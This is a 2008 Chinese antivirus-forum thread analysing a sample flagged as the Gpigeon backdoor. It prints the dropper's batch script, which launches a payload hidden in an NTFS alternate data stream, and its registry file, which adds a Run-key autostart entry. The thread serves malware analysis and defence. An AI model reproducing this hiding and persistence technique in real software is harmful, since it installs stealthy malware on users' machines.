特别的鸽子（转自卡饭） bbs.ikaka.com

wjzdw - 2008-6-23 19:47:00

动作目标：C:\PROGRAM FILES\COMMON FILES\INSTALLSHIELD\PROFESSIONAL
动作：创建C:\PROGRAM FILES\COMMON FILES\INSTALLSHIELD\PROFESSIONAL

不懂创建这个能干什么~~

---------------------------
错误
---------------------------
"C:\Program Files\Common Files\InstallShield\Professional\RunTime"
文件夹无法访问
---------------------------
确定
---------------------------

附件: 您所在的用户组无法下载或查看附件

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MAXTHON 2.0)

附件: RunTime.rar

轩辕小聪 - 2008-6-23 20:40:00

转卡饭哪的？给出原帖链接。鸽子的定性谁下的？
既不是Delphi所写，输入表更没有任何操作服务的API，怎么可能是鸽子呢？说它释放鸽子我还信，说它本身是鸽子就太没道理了。

RisingCSC - 2008-6-24 10:01:00

瑞星杀毒软件版本20.50.02
Backdoor.Gpigeon.urw RunTime.exe>>1.txt:5.exe

轩辕小聪 - 2008-6-24 17:44:00

实际上RunTime.exe本身的可执行文件部分根本不是鸽子，正如我上面所说。
鸽子来自于它的附加数据部分。附加数据从文件偏移0x2F4000开始，为一个带有自解压命令的RAR文件。
将此RAR文件拿出来，用WINRAR打开，如图：

附件: 您所在的用户组无法下载或查看附件
由自解压脚本，自解压时运行的是1.bat，1.bat内容：

[复制到剪贴板]

CODE:

cd %ProgramFiles%\Common Files\InstallShield\Professional\RunTime\
regedit /s 1.orz
start .\1.txt:5.exe

使用regedit导入1.orz。1.orz是一个UNICODE字符集的.reg文件，内容：

[复制到剪贴板]

CODE:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Cleaner"="\"C:\\Program Files\\Common Files\\InstallShield\\Professional\\RunTime\\1.bat\""

即写入启动项。
然后运行1.txt附带的ADS流文件5.exe，这个5.exe才是鸽子。
而且这种方法的前提是，系统盘应为NTFS格式。

wjzdw - 2008-6-24 19:41:00

引用:

原帖由 轩辕小聪 于 2008-6-23 20:40:00 发表
转卡饭哪的？给出原帖链接。鸽子的定性谁下的？
既不是Delphi所写，输入表更没有任何操作服务的API，怎么可能是鸽子呢？说它释放鸽子我还信，说它本身是鸽子就太没道理了。

没说它是鸽子饿但这家伙能过微为啥不能显示点估计也能过瑞星的主防

楼上的老兄不是发上来让你杀的是让你研究如何改进主动防御的

数据流 .........

那个病毒文件好奇特显示0kB大小

如果中了这种木马不晓得SRENG能不能扫出来

wjzdw - 2008-6-24 19:46:00

还有问一下昨天电脑不知怎么用QQ时输进密码老提示错误

得用软键盘输 TM也一样把QQ卸载了重装也不行

最后重装系统才能解决请问有可能是什么情况？

（运行上面那家伙后发现的不过应该没关系吧...）

baohe - 2008-6-26 9:40:00

汗！
对付这DD，方法很多。
能过主防就牛B吗？

附件: 您所在的用户组无法下载或查看附件

附件: 1.jpg

wjzdw - 2008-6-26 11:41:00

引用:

原帖由 baohe 于 2008-6-26 9:40:00 发表
汗！
对付这dd，方法很多。
能过主防就牛b吗？

附件: 您所在的用户组无法下载或查看附件

没说牛逼饿~~

权限不足受限用户运行的？组策略？

瑞星卡卡安全论坛